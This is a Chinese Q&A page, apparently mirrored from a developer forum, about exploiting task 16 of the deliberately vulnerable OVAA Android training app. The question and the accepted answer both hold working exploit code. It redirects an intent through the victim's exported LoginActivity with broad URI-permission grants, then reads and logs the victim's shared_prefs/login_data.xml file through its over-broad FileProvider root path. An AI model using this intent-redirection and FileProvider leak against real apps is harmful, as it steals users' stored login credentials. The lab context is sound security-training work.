如何解决具有隐式意图的android Content Provider泄漏数据
有一个易受攻击的应用程序可以练习Android安全性。 Link Here而且我被困在它的16次任务中。
16。在根条目中对oversecured.ovaa.fileprovider内容提供程序使用非常广泛的文件共享声明。
MainActivity.Java
public class MainActivity extends AppCompatActivity {
@Override
protected void onCreate(Bundle savedInstanceState) {
super.onCreate(savedInstanceState);
setContentView(R.layout.activity_main);
Intent extra = new Intent(Intent.ACTION_VIEW);
extra.setFlags(Intent.FLAG_GRANT_READ_URI_PERMISSION );
extra.setClassName(getPackageName(),"com.exploit.app.LeakActivity");
extra.setType("text/xml");
extra.setData(Uri.parse("content://oversecured.ovaa.fileprovider/root/data/data/oversecured.ovaa/shared_prefs/login_data.xml"));
Intent intent = new Intent();
intent.setClassName("oversecured.ovaa","oversecured.ovaa.activities.LoginActivity");
intent.putExtra("redirect_intent",extra);
startActivity(intent);
}
}
LeakActivity.java
public class LeakActivity extends MainActivity {
InputStream i = getContentResolver().openInputStream(getIntent().getData());
public LeakActivity() throws FileNotFoundException {
}
}
AndroidManifest.xml
<activity android:name=".MainActivity">
<intent-filter>
<action android:name="android.intent.action.MAIN" />
<category android:name="android.intent.category.LAUNCHER" />
</intent-filter>
</activity>
<activity android:name=".LeakActivity" />
谢谢
解决方法
我已验证,确认以下提供的代码对我有用:
MainActivity.java
public class MainActivity extends AppCompatActivity {
private Button button;
@Override
protected void onCreate(Bundle savedInstanceState) {
super.onCreate(savedInstanceState);
setContentView(R.layout.activity_main);
button = (Button) findViewById(R.id.button);
button.setOnClickListener(new View.OnClickListener(){
@Override
public void onClick(View v){
Intent extra = new Intent();
extra.setFlags(Intent.FLAG_GRANT_PERSISTABLE_URI_PERMISSION
| Intent.FLAG_GRANT_PREFIX_URI_PERMISSION
| Intent.FLAG_GRANT_READ_URI_PERMISSION
| Intent.FLAG_GRANT_WRITE_URI_PERMISSION);
extra.setClassName(getPackageName(),"com.example.fileleaker.Leaker");
extra.setData(Uri.parse("content://oversecured.ovaa.fileprovider/"));
Intent intent = new Intent();
intent.setClassName("oversecured.ovaa","oversecured.ovaa.activities.LoginActivity");
intent.putExtra("redirect_intent",extra);
startActivity(intent);
}
});
}
}
Leaker.java
public class Leaker extends AppCompatActivity {
@Override
protected void onCreate(Bundle savedInstanceState) {
super.onCreate(savedInstanceState);
setContentView(R.layout.activity_leaker);
Uri uri = Uri.parse(getIntent().getDataString() + "root/data/data/oversecured.ovaa/shared_prefs/login_data.xml"); // content://com.victim.provider/image/1
try {
InputStream i = getContentResolver().openInputStream(uri); // stolen image
//creating an InputStreamReader object
InputStreamReader isReader = new InputStreamReader(i);
//Creating a BufferedReader object
BufferedReader reader = new BufferedReader(isReader);
StringBuffer sb = new StringBuffer();
String str;
while((str = reader.readLine())!= null){
Log.v("Hello","=======File__DATA======="+str+"==========");
}
}catch (FileNotFoundException e) {
e.printStackTrace();
} catch (IOException e) {
e.printStackTrace();
}
}
}
AndroidManifest.xml
<activity android:name=".Leaker">
<intent-filter>
<action android:name="android.intent.action.MAIN" />
</intent-filter>
</activity>
<activity android:name=".MainActivity">
<intent-filter>
<action android:name="android.intent.action.MAIN" />
<category android:name="android.intent.category.LAUNCHER" />
</intent-filter>
</activity>
版权声明:本文内容由互联网用户自发贡献,该文观点与技术仅代表作者本人。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌侵权/违法违规的内容, 请发送邮件至 dio@foxmail.com 举报,一经查实,本站将立刻删除。